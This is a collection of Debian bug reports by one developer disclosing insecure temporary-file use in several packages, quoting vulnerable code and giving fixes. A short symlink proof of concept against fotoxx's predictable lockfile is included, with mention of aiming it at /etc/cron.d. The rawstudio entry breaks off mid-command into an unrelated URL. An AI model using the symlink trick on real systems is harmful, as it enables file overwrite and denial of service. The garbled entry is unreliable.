 tracked as security issues even if in practice they'll never be
 exploited.
 e.g. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2524

Steve
-- 


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#772473: xbindkeys-config: Insecure use of temporary files

[Steve Kemp]

Package: xbindkeys-config
Version: 0.1.3-2
Severity: important
Tags: security

If you use this program and "view generated file" the current output
will be saved to the file /tmp/xbindkeysrc-tmp.

This allows the corruption of any file the user has permission to write
to.

Later this predictable file is used to execute commands:

/*/
void middle_apply_action(GtkWidget *parent, void *data)
{

  unlink(TEMP_FILE); 
  save_file(TEMP_FILE);
  system("killall -9 xbindkeys");
  usleep(500);
  /* printf("\n\noutput = %d\n\n",system("xbindkeys -f " TEMP_FILE )); 
*/
  system("xbindkeys -f " TEMP_FILE );
}


Really most of this complexity could go away if we just assumed the
editor would write to a file the user specified, or ~/.xbindkeysrc.


Given the number of bugs that have been untouched for a long time this
package should probably not go into the Jessie release without a good
update.

Regardless this is a classic case of insecure-temporary files and should
almost certainly have a CVE ID allocated.

Steve


-- System Information:
Debian Release: 7.7
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16-0.bpo.2-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash

Versions of packages xbindkeys-config depends on:
ii  libatk1.0-0 2.4.0-2
ii  libc6   2.13-38+deb7u6
ii  libcairo2   1.12.2-3
ii  libfontconfig1  2.9.0-7.1
ii  libfreetype62.4.9-1.1
ii  libglib2.0-02.33.12+really2.32.4-5
ii  libgtk2.0-0 2.24.10-2
ii  libpango1.0-0   1.30.0-1
ii  xbindkeys   1.8.5-1
ii  zlib1g  1:1.2.7.dfsg-13

xbindkeys-config recommends no packages.

xbindkeys-config suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#765697: ITP: libtest-tabs-perl -- check the presence of tabs in your project

[Steve Kemp]

On Fri Oct 17, 2014 at 15:38:02 +0200, Jonas Smedegaard wrote:

> Not sure what it is you suggest: Seems to me like they have _opposite_ 
> scopes :-)

  You're right, I'm clearly mistaken/wrong and not being helpful.

  Sorry for the noise.

Steve
--


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#765697: ITP: libtest-tabs-perl -- check the presence of tabs in your project

[Steve Kemp]

On Fri Oct 17, 2014 at 14:38:07 +0200, Jonas Smedegaard wrote:

>  Test::Tabs scans your project/distribution for any perl files (scripts,
>  modules, etc) for the presence of tabs.
>  .

> Needed for some uses of Dist::Inkt.
> Will be maintained in the Perl team.

  Looks like a simple/small module, but so very close in scope to
  Test::NoTabs.

  Might it be worth suggesting the upstream changes?

http://search.cpan.org/perldoc?Test%3A%3ANoTabs

https://packages.debian.org/search?keywords=libtest-notabs-perl

Steve
-- 


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#761879: fotoxx: Insecure use of temporary files

[Steve Kemp]

Package: fotoxx
Version: 11.11.1-1.1
Severity: important
Tags: security



(Irrelevent) Printing Issues


All three versions of fotoxx packaged for Debian (squeeze, wheezy, and jessie)
make insecure use of a temporary file when printing in the function `wprintp`
in zfuncs.cc.

//  print text dialogs
void wprintp()
{
   pid = getpid();
   snprintf(tempfile,49,"/tmp/wprintp-%d",pid);
   err = wfiledump(mLog,tempfile);
   if (err) return;
}

Happily this code doesn't ever seem to be called, so it can be safely removed.




Email Attachments
-

In version 11.11.1-1.1 (wheezy-only) the code to handle adding attachments to 
emails is seriously broken.

The code in question is located in the function `email_dialog_event` in the 
file `fotoxx_tools.cc`, and in brief it:


1. Creates a temporary directory:
 /tmp/$USER/fotoxx/email

2. Removes *.jpg from that directory.

3. Copies the selected files to that directory, mandating a fixed naming 
pattern, after resizing/downsampling.

4. Builds up a command line:

 xdg-email --attach file1 --attach file2 ..

5. Executes it.


The third step allows file-truncation and overwriting, due to the lack of 
testing for collisions in the output step.




Global Lockfile
---

In version 11.11.1-1.1 (wheezy-only) the file 
"/tmp/global_lock_fotoxx_syncfiles" is used insecurely
as an attempt to avoid multiple syncs.

Create the lockfile as a symlink and fotoxx will gladly follow it, creating an 
empty file.  This
could perhaps be leveraged if the symlink pointed to /etc/cron.d, or DoS via 
the creation of
/etc/nologin if fotoxx is ever executed as root.

$ ln -s /tmp/foo /tmp/global_lock_fotoxx_syncfiles
$ ls -l /tmp/global_lock_fotoxx_syncfiles
/tmp/global_lock_fotoxx_syncfiles -> /tmp/foo

ls -l /tmp/foo
ls: cannot access /tmp/foo: No such file or directory

Now launch fotoxx and see that the file has been created:

$ ls -1 /tmp/foo
/tmp/foo



14.07.1
---

This seems to unsafely create /tmp/fotoxx-%s based on the PID of the
process.  This should be investigated too.


-- System Information:
Debian Release: 7.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.14-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash

Versions of packages fotoxx depends on:
ii  libatk1.0-0 2.4.0-2
ii  libc6   2.13-38+deb7u4
ii  libcairo2   1.12.2-3
ii  libfontconfig1  2.9.0-7.1
ii  libfreetype62.4.9-1.1
ii  libgcc1 1:4.7.2-5
ii  libgdk-pixbuf2.0-0  2.26.1-1
ii  libglib2.0-02.33.12+really2.32.4-5
ii  libgtk2.0-0 2.24.10-2
ii  libpango1.0-0   1.30.0-1
ii  libstdc++6  4.7.2-5
ii  libtiff43.9.6-11

Versions of packages fotoxx recommends:
ii  libimage-exiftool-perl  8.60-2
pn  libtiff 
ii  ufraw-batch 0.18-2
pn  xgd-open

Versions of packages fotoxx suggests:
ii  brasero  3.4.1-4

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#761828: fotoxx: Software packaged for Debian should not "phone home"

[Steve Kemp]

Package: fotoxx
Version: 14.07.1-1
Severity: normal

Dear Maintainer,

The version of fotoxx available to Jessie, version 14.07.1-1,
contains code which runs at startup to:

* Phone home.
* Attempt to update itself.

"Phoning home", no matter how benignly, without explicit consent
from the user is somethign that was should not encourage.

The code also attempts to download new releases, which is something
that should not be done - we're Debian users and our updates should
come from Debian packages, rather than random binaries downloaded
via 'wget' insecurely.

Please read the `int initzfunc(void *)` function, as implemented in 
fotoxx-14.07.1.cc.

My preferred solution would be to add "return 0;" at teh head of that
function, but as maintainer you get to decide how much should be
neutered.

[This functionality is new, it was not present in the squeeze/wheezy versions.]

-- System Information:
Debian Release: 7.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.14-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#756565: CVE

[Steve Kemp]

On Tue Sep 09, 2014 at 12:52:38 +0300, Henri Salo wrote:

> Have you requested CVE already? If you want I can verify this issue and create
> the request.

  I have not, the lack of update to the bug report made it slip my mind.

  If you'd like to confirm the issues, which shouldn't be hard, and
 request one then please do feel free.

Steve
--


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#756600: xcfa: Insecure use of temporary files, subject to race conditions

[Steve Kemp]

Package: xcfa
Version: 4.3.1-1
Severity: important
Tags: security

xcfa contains several insecure uses of temporary files.

For example the file src/get_info.c has code to test that
curl is present, in the function GetInfo_wget which
essentially runs:

wget --user-agent=\"Mozilla 22.0\" --directory-prefix=/tmp/  
http://google.fr/
..
if [ -e /tmp/index.html ]; then 
rm /tmp/index.html
fi

This is probably safe, because wget will not follow symlinks, and will
instead create "index.html.1" - but any existing file called /tmp/index.html
will be removed regardless.

More serious issues exist throughout the codebase.  For example the
code in dvdread_create_recap_audio, located in src/dvd_read.c contains
this lovely function:

// Suppression du fichier precedant si il existe
g_unlink ("/tmp/get_infos_dvd.sh");
g_unlink ("/tmp/infos_dvd.txt");

fp = fopen ("/tmp/get_infos_dvd.sh", "w");

fprintf (fp, "#!/bin/sh\n");
fprintf (fp, "\n");
fprintf (fp, "set -e\n");
fprintf (fp, "\n");

..
..

system ("chmod +x /tmp/get_infos_dvd.sh");

system ("/tmp/get_infos_dvd.sh");
g_unlink ("/tmp/get_infos_dvd.sh");


Similarly the code which copies files to the trashbin, located in 
src/file_trash.c,
has some nice code which runs:

system ("env | grep \"KDE_FULL_SESSION\" > 
/tmp/tst_kde_full_session.txt");
if ((fp = fopen ("/tmp/tst_kde_full_session.txt", "r")) != NULL) {
while (fgets (buf, MAX_CARS_KDE, fp) != NULL) {
if (strcmp (buf, "KDE_FULL_SESSION") == 0) {
if (strcmp (buf, "true") == 0 || strcmp (buf, 
"TRUE") == 0) {
BoolRet = TRUE;
break;
}
}
}
fclose (fp);
}
g_unlink ("/tmp/tst_kde_full_session.txt");


In short this codebase is rife with race-conditions allowing arbitrary shell 
executation,
via /tmp/get_infos_dvd.sh, and file truncation/deletion.

I'd strongly urge the maintainer to audit the codebase for additional issues, 
with the
help of upstream.



Steve
--



-- System Information:
Debian Release: 7.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.14-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#756566: libxml-dt-perl: Insecure use of temporary files

[Steve Kemp]

Package: libxml-dt-perl
Version: 0.62-1
Severity: important
Tags: security


The libxml-dt-perl package installs the script "/usr/bin/mkxmltype"
which blindly overwrites the contents of the file:

/tmp/_xml_$$

(Where '$$' corresponds to the PID of the process.)

This is insecure and can allow the truncation of arbitrary files
the user has permission to access.

A similar problem exists in /usr/bin/mkdtskel, again the file
accessed is /tmp/_xml_$$.

Both scripts should be updated to use File::Temp, or similar.


Steve
--  
http://steve.org.uk/

-- System Information:
Debian Release: 7.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.14-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#756565: lives: Numerous insecure temporary files used in smogrify

[Steve Kemp]

Package: lives
Version: 1.6.2
Severity: important
Tags: security


lives contains a perl script, smogrify, which is what does
a lot of the work.

I don't want to point out line-by-line all the issues in the
smogrify script, but please consider significantly overhauling it.

There are numerous insecure uses of temporary files.  For example:

if ($command eq "get_window_id") {
smog_system("xwininfo > \"$curtmpdir/tmpinfo\"");

smog_system("grep \"Window id:\" \"$curtmpdir/tmpinfo\" > 
\"$curtmpdir/tmpinfo2\"");
if (defined(open IN,"< $curtmpdir/tmpinfo2")) {
read IN,$win_id,128;
close IN;
}

You'll see that $curtmpdir is set to /tmp/smogrify, via code such as:

$handle=$ARGV[1];
$curtmpdir="$tmpdir/$handle";

To investigate all the issues is beyond my free timeframe, but I'd suggest
a  decent starting point is to run the whole system under strace and grep
for /tmp in open|close|unlink|creat calls.

Steve
--

-- System Information:
Debian Release: 7.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.14-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#754899: rawstudio: Insecure use of temporary file.

[Steve Kemp]

Package: rawstudio
Version: 2.0-1.1
Severity: important

Dear Maintainer,

The function "rs_filter_graph" located in file ./librawstudio/rs-filter.c 
contains the following code:

g_string_append_printf(str, "}\n");
g_file_set_contents("/tmp/rs-filter-graph", str->str, str->len, NULL);

ignore = system("dot -Tpng >/tmp/rs-filter-graph.png 
https://dns-api.com/




-- System Information:
Debian Release: 7.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.14-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#749846: trafficserver: Insecure command execution and use of temporary filenames.

[Steve Kemp]

On Mon Jun 02, 2014 at 10:23:23 +0100, Steven Chamberlain wrote:

> http://sources.debian.net/src/trafficserver/3.0.5-1/mgmt/tools/SysAPI.cc
> > NOWARN_UNUSED_RETURN(system("/bin/mv -f /tmp/shadow /etc/shadow"));
> 
> Won't that reset the shadow file's ownership to root:root?  If default
> umask is 027, the file won't be readable any more by the shadow group;
> won't that break login if this code is ever used?

  To be honest I couldn't see the /etc/shadow-touching code even being
 invoked.  So while I think there are many issues here, including the
 loss of the `shadow` group membership it is probably the case that
 this doesn't matter.

  In more recent versions of trafficserver some of those functions have
 been removed, although there are still some /tmp-file abuses left in
 place.

> (Or if umask is less strict for some reason, the file becomes
> world-readable I suppose?)

  Yeah.

> And there is plenty more /tmp abuse in that file - here it tries to
> delete the file, but there is still a race before creating/writing to it:

  These are the more serious issues, because they're actually
 invoked/used, as you can determine via strace and grep.

> Also there is plenty of code here not likely to work at all on a Debian
> system.

  Agreed..

> [ Hoping this whole file isn't needed, and can simply go away :) ]

  In the older release some functions are defined but never used, those
 relating to /etc/shadow for example, but there remain bits that are
 called.


Steve
--
Let me steal your soul?
http://stolen-souls.com


signature.asc
Description: Digital signature

Bug#749846: trafficserver: Insecure command execution and use of temporary filenames.

[Steve Kemp]

Package: trafficserver
Version: 3.0.5-1
Severity: important
Tags: security


Dear Maintainer,

The binary `/usr/bin/traffic_shell` contains the following strings, which
should be sufficient to explain the issue:

/bin/mv -f /tmp/shadow /etc/shadow
/bin/sort /tmp/zonetab.tmp > /tmp/zonetab
/bin/cp -f %s/net_config.xml /tmp/net_config.xml
/tmp/dhcp_status
/tmp/route_status
/tmp/shadow
..

I didn't look at the code in depth, but there are at least two
errors here:

 * Predictable filenames, allowing file truncation/removal.

 * Race-conditions accessing files.

The code in question comes from:

   trafficserver-3.0.5/mgmt/tools/SysAPI.cc + ConfigAPI.cc

The code that uses /tmp should be updated to use popen, or similar
to avoid the temporary files.  Failing that a secure temporary filename
should be generated.

Please do request/assign CVE identifiers.



-- System Information:
Debian Release: 7.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.14-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash

Versions of packages trafficserver depends on:
ii  adduser  3.113+nmu3
ii  libc62.13-38+deb7u1
ii  libcap2  1:2.22-1.2
ii  libexpat12.1.0-1+deb7u1
ii  libgcc1  1:4.7.2-5
ii  libpcre3 1:8.30-5
ii  libssl1.0.0  1.0.1e-2+deb7u9
ii  libstdc++6   4.7.2-5
ii  lsb-base 4.1+Debian8+deb7u1
ii  tcl8.5   8.5.11-2
ii  zlib1g   1:1.2.7.dfsg-13

trafficserver recommends no packages.

trafficserver suggests no packages.

-- no debconf information


Steve
--
http://steve.org.uk/

Bug#748766: scheme48: Insecure use of temporary file for communication.

[Steve Kemp]

Package: scheme48
Version: 1.8+dfsg-1
Severity: important
Tags: security

The function `scheme48-send-definition` in cmuscheme48.el blindly
overwrites the file /tmp/s48lose.tmp prior to sending it to
the inferior scheme process.

This action will blindly overwrite files the user has permission
to modify, causing data-loss.

The function should be modified to generate a secure and non-predictable
filename, perhaps via `make-temp-file` or similar.

-- System Information:
Debian Release: 7.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.12-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash

Steve
--
http://steve.org.uk/


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#747100: bug#17428: Bug#747100: emacs23: Insecure use of temporary files in included lisp libraries/packages

[Steve Kemp]

  Clearly I'm an idiot, the correct link is this:

http://www.openwall.com/lists/oss-security/2014/05/07/7

Steve
-- 
http://www.steve.org.uk/

Bug#747100: bug#17428: Bug#747100: emacs23: Insecure use of temporary files in included lisp libraries/packages

[Steve Kemp]

  These issues have now had several CVE identifiers
 associated with them, for future tracking:

http://www.openwall.com/lists/oss-security/2014/03/14/5

Steve
-- 
http://www.steve.org.uk/

Bug#747100: emacs23: Insecure use of temporary files in included lisp libraries/packages

[Steve Kemp]

Package: emacs23
Version: 23.4+1-4
Severity: important

There are several tempfile-vulnerabilities present in the Emacs Lisp
bundled and distributed with the emacs23 package.

Here are four brief pointers to unsafe code:

lisp/gnus/gnus-fun.el:
  In the function `gnus-grab-cam-face` the file "/tmp/gnus.face.ppm" is
 used, blindly allowing the existing file to be truncated, and symlinks
 followed.

lisp/emacs-lisp/find-gc.el:
  In the function `trace-call-tree` there are some horrific invocations
 of the csh, which manipulate the directory and symlinks beneath "/tmp/esrc".

lisp/net/browse-url.el
  In the function `browse-url-mosaic` the file "/tmp/Mosaic.$PID" is blindly
 overwritten.  Suspect this whole function is obsolete though :)

lisp/net/tramp.el
  The function `tramp-uudecode`, a fallback if a real uudecoding binary
 is not present, blindly uses "/tmp/tramp.$PID", truncating and removing
 the file.


I suspect that each should receive a CVE identifier.


-- System Information:
Debian Release: 7.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.12-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash

Versions of packages emacs23 depends on:
ii  emacs23-bin-common  23.4+1-4
ii  gconf-service   3.2.5-1+build1
ii  libasound2  1.0.25-4
ii  libatk1.0-0 2.4.0-2
ii  libc6   2.13-38+deb7u1
ii  libcairo2   1.12.2-3
ii  libdbus-1-3 1.6.8-1+deb7u1
ii  libfontconfig1  2.9.0-7.1
ii  libfreetype62.4.9-1.1
ii  libgconf-2-43.2.5-1+build1
ii  libgdk-pixbuf2.0-0  2.26.1-1
ii  libgif4 4.1.6-10
ii  libglib2.0-02.33.12+really2.32.4-5
ii  libgpm2 1.20.4-6
ii  libgtk2.0-0 2.24.10-2
ii  libice6 2:1.0.8-2
ii  libjpeg88d-1
ii  libm17n-0   1.6.3-2
ii  libncurses5 5.9-10
ii  libotf0 0.9.12-2
ii  libpango1.0-0   1.30.0-1
ii  libpng12-0  1.2.49-1
ii  librsvg2-2  2.36.1-2
ii  libsm6  2:1.2.1-2
ii  libtiff43.9.6-11
ii  libtinfo5   5.9-10
ii  libx11-62:1.5.0-1+deb7u1
ii  libxft2 2.3.1-1
ii  libxpm4 1:3.5.10-1
ii  libxrender1 1:0.9.7-1+deb7u1
ii  zlib1g  1:1.2.7.dfsg-13

emacs23 recommends no packages.

Versions of packages emacs23 suggests:
pn  emacs23-common-non-dfsg  

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#741953: libreadline6: Insecure use of temporary files - in _rl_trace

[Steve Kemp]

Package: libreadline6
Version: 6.2+dfsg-0.1
Severity: important
Tags: security

Dear Maintainer,

I noticed that GNU Readline version 6.x makes insecure use of
files when outputting debugging information via the _rl_trace
function.

The details were reported here:

  http://www.openwall.com/lists/oss-security/2014/03/14/5

There is a classic race-condition present here, which allows
files to be overwritten.

This was allocated the identifier: CVE-2014-2524


Steve
-- 
http://steve.org.uk/

-- System Information:
Debian Release: 7.4
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.12-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash

Versions of packages libreadline6 depends on:
ii  libc6  2.13-38+deb7u1
ii  libtinfo5  5.9-10
ii  multiarch-support  2.13-38+deb7u1
ii  readline-common6.2+dfsg-0.1

libreadline6 recommends no packages.

libreadline6 suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#741627: insecure temporary file usage in apt-extracttemplates

[Steve Kemp]

Package: apt
Version: 0.9.7.9+deb7u1
Severity: important
Tags: security


When installing/upgrading packages via `apt-get` a child process
is invoked against the downloaded .deb-file to extract any templates
which might be contained in that package.

For example I was recently upgrading my lighttpd package and I see
this is logged (thanks to `snoopy`):

  apt-extracttemplates 
/var/cache/apt/archives/lighttpd_1.4.31-4+deb7u2_amd64.deb 

As that package contains no actual templates all is well.

However consider a case where templates/config files are present,
again upon my system I can see that some recent downloads do indeed
include such things, and they are output as expected via the
apt-extracttemplates invokation:

  shelob ~ $ apt-extracttemplates 
/var/cache/apt/archives/gdm3_3.4.1-8_amd64.deb 
  gdm3 3.4.1-8 /tmp/gdm3.template.136800 /tmp/gdm3.config.136801

What `apt-extracttemplates` has done is twofold:

  * Extracted the template & config files.
  * Reported their location.

However what it has also done is create files with predictable
filenames, overwriting the carefully constructed memoirs I kept
in the file /tmp/gdm3.template.136800 ... ;)

Mitigating factors?  The code correctly removes files first, so
symlinks and hardlinks are not followed.  I suppose that makes this
"trivial" rather than "serious", (Yes a "standard" temporary race
could allow symlink/link following, but it looks like the file
is opened via O_CREAT + O_EXCL so that's not a concern - right?)

Anyway given that the generated file names are output to the console
it feels like we should use mkstemp and do it properly, right?


The code in question is in cmdline/apt-extracttemplates.cc,
in the function "string WriteFile(const char *package, const char *prefix, 
const char *data)
":

char fn[512];
...

snprintf(fn, sizeof(fn), "%s/%s.%s.%u%d",
 _config->Find("APT::ExtractTemplates::TempDir", 
tempdir).c_str(),
 package, prefix, getpid(), i++);

if (!f.Open(fn, FileFd::WriteTemp, 0600))


The opening, which mitigates this, is carried out using 'WriteTemp',
which is implemented in apt-pkg/contrib/fileutl.cc, and maps to:

WriteTemp = ReadWrite | Create | Exclusive,

(from fileutl.h.)


Steve
-- 
http://tweaked.io/

-- Package-specific info:

-- (no /etc/apt/preferences present) --


-- (/etc/apt/sources.list present, but not submitted) --


-- System Information:
Debian Release: 7.4
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.12-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash

Versions of packages apt depends on:
ii  debian-archive-keyring  2012.4
ii  gnupg   1.4.12-7+deb7u3
ii  libapt-pkg4.12  0.9.7.9+deb7u1
ii  libc6   2.13-38+deb7u1
ii  libgcc1 1:4.7.2-5
ii  libstdc++6  4.7.2-5

apt recommends no packages.

Versions of packages apt suggests:
pn  apt-doc 
ii  aptitude0.6.8.2-1
ii  dpkg-dev1.16.12
ii  python-apt  0.8.8.2
ii  synaptic0.75.13
ii  xz-utils5.1.1alpha+20120614-2


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#741370: pen: security issues with pen

[Steve Kemp]

 CVE-2014-2387 has been allocated for the two hardcoded/insecure
 uses of temporary files.

 ("/tmp/webfile.html", and "/tmp/penctl.cgi".)

Steve
--


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#741370: pen: security issues with pen

[Steve Kemp]

On Thu Mar 13, 2014 at 14:46:37 +0100, Ulric Eriksson wrote:

> The control socket and the configuration file use the exact same
> syntax by design.

  I see that is currently the case, yes..

> If it is impossible or impractical to limit
> access to the socket, the same level of control over a running Pen
> can be accomplished from localhost by editing the config and an
> old-fashioned HUP.

  While this is true, and people are free to run things as they
 wish, I've been assuming a root-owned configuration file & init
 script.  So an unprivileged local user wouldn't be able to either
 reload or edit the config.

> A password would imply that the protocol is safe, which it
> obviously isn't - it is plain text over tcp.

  I don't see the connection there.  You might express it in
 reverse "Because the control socket allows 'unsafe things' a
 password proves you have legitimate reason to talk to/with it."

> A Unix-domain control socket is a trivial change which wouldn't
> break anything but allow much more fine-grained control over who
> has access from localhost. A brilliant idea which I congratulate
> myself on.

  Actually that didn't occur to me, but as you say it is a lovely
 solution.  Root could start the deamon with the socket having
 mode 600 and local users wouldn't be able to do bad things with it,
 similarly a local user could have ~/.pen.sock and they'd be safe
 against other local users - but not root, of course.

  Use a domain-socket and I think things become much tighter. 
 Great idea!

Steve
--
Let me steal your soul?
http://stolen-souls.com


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#741370: pen: security issues with pen

[Steve Kemp]

  [Apologies for bouncing your mails.  Fixed now.]


> The core issue being that it is possible to run pen with remote
> control from untrusted hosts (or any host), should the administrator so
> desire.

  Agreed.  I did think of limiting the control-socket to 127.0.0.1:XX
 but that a) reduces flexibility and b) still isn't sufficient to
 prevent a local user to run commands.

  To my mind there are two issues here:

  1.  Anybody that can connect to the control socket can do "things".

  2.  The are "things" that can be done which result in potential
 security problems.

  The ideal solution would be to require password authentication
 in addition to the socket connectivity.  This would let you,
 potentially, run with a control-socket wide open, but still restrict
 malicious connections.

  (Obviously from localhost you'd want to have a password in an
 unreadable file, to avoid it from being read via vi, or similar.)

  The second problem of allowing file overwrites via the "write"
 primitive could be solved via chrooting, dropping privileges to
 nobody, or disabling the primitive unless it appears in the config
 file.

  I'm not sure how generally useful all the primitives are, but I could
 see the case for only allowing some primitives to work from a config
 file and not interactively.  Similarly I could see dropping privileges
 from root to "pen" and chrooting to "/var/run/pen" would avoid any
 file overwrites from happening - because the deamon would simply not
 have the permission to do so.

  As you say the .CGI script is perhaps best avoided, but the
 documentation should certainly mention potential concerns with
 the use of a control socket.

  I've requested CVE IDs for the various issues, and will update
 if/when I receive them.

Steve
-- 
http://www.steve.org.uk/


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#741370: pen: security issues with pen

[Steve Kemp]

Package: pen
Version: 0.18.0-1
Severity: minor
Tags: security

There are four issues to report here;

1.  Predictable filename in pen itself.
2.  Insecure temporary filename in the contributed CGI script.
3.  File overwrite / disclosure issues in pen.
4.  Information disclosure.



Predictable filename in pen itself
---

When pen is instructed to dump statistics it will use the name
/tmp/webfile.html by default.

This is not a major concern given that it is created owned by
the attacker:


shelob ~ $ sudo pen  localhost:9000 -C 127.0.0.1:5043 
shelob ~ $ penctl 127.0.0.1:5043 statistics
shelob ~ $ ls -l /tmp/webfile.html 
-rw-r--r-- 1 skx skx 3746 Mar 11 18:28 /tmp/webfile.html


Insecure temporary filename in the contributed CGI script
---

The file /usr/share/doc/pen/penctl.cgi contains this horrible
content:

$PENCTL $SERVER:$PORT status 2> /tmp/penctl.cgi

